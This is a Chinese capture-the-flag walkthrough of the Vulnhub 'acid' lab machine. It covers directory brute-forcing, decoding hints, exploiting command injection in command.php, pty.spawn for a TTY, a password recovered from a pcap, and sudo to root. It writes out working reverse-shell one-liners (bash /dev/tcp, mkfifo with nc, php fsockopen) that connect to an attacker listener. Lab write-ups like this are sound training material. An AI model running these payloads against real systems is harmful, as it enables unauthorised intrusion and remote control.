Vulnhub之acid靶机渗透流程

1，检查靶机主机是否存活。

2，检查靶机开放的端口并对端口进行识别

发现33447端口存活(存在web服务)
由于只存在web服务和apache服务，所以只能从web服务和apache服务下手。

3，首先直接御剑一把梭

大概看了下，先放在这里。

F12查看网页源码，发现存在注释。

0x643239334c6d70775a773d3d16进制转换为字符串d293LmpwZw==，最终解码出来为wow.jpg

因为御剑直接扫描出来了images目录直接查看

发现了一张图片，保存图片到本地

将图片打开发现一串编码，（3761656530663664353838656439393035656533376631366137633631306434）刚开始推测为ascll码，后发现不对，又
猜测为16进制

解码为7aee0f6d588ed9905ee37f16a7c610d4，猜测为md5,解密为63425，。 猜测可能是密码.

然后这条线没什么思路了。
接着想到了前面御剑扫描出来了http://192.168.93.129:33447/Challenge/index.php目录，访问，是一个登录页面，先是尝试了万能密码登录，发现并没有用，后使用bp抓包，进行sql注入，也没有效果。

分别访问include.php cake.php hacked.php文件，发现都必须要登录，这样可就没法了。
后台看了网上大佬的思路,，才发现目录名Magic_box。

大佬这样解释说：我猜测能想到那个目录是因为那个Challenge，因为那个Challenge即是一个标题也是一个目录，所以当看到那个Magic_Box标题时就该去想这是不是也是一个目录。

后去爆破Magic_Box目录

发现了low.php,command.php。访问文件发现command.php存在命令执行漏洞

输入 192.168.93.129 & ls。发现存在****command.php command.php.save command2.php.save command2.php.save.1 low.php proc tails.php****

通过命令执行，尝试拿到shell

Kali上开启监听端口

• 尝试使用bash -i >& /dev/tcp/192.168.93.130/2333 0>&1反弹shell
  
  命令执行部分使用url编码。
  无果。

无果

• 尝试使用rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.93.130 2333 >/tmp/f

无果

• 尝试使用php -r '$sock=fsockopen("192.168.93.130",2333);exec("/bin/sh -i <&3 >&3 2>&3");'

反弹shell成功。Nice

查看靶机下的用户。
cat /ect/passwd

注意home下的用户。
分别查看用户下的文件
find / -user [用户] 2>/dev/null

find / -user saman 2>/dev/null

find / -user ntp 2>/dev/null

find / -user acid 2>/dev/null

发现一个流量包，使用命令将流量包下载下来。

scp /sbin/raw_vs_isi/hint.pcapng [email protected]:/root/

发现错误没有权限
然后提权
执行su命令

发现错误，必须在终端上运行，google搜索之

解决办法：用python调用本地的shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py

成功拿到终端

追踪TCP流，发现saman—》1337hax0r

于是提权

提权成功
再使用sudo -i 提权到root

列举看看root下有哪些文件，发现flag.txt
后查看文件发现flag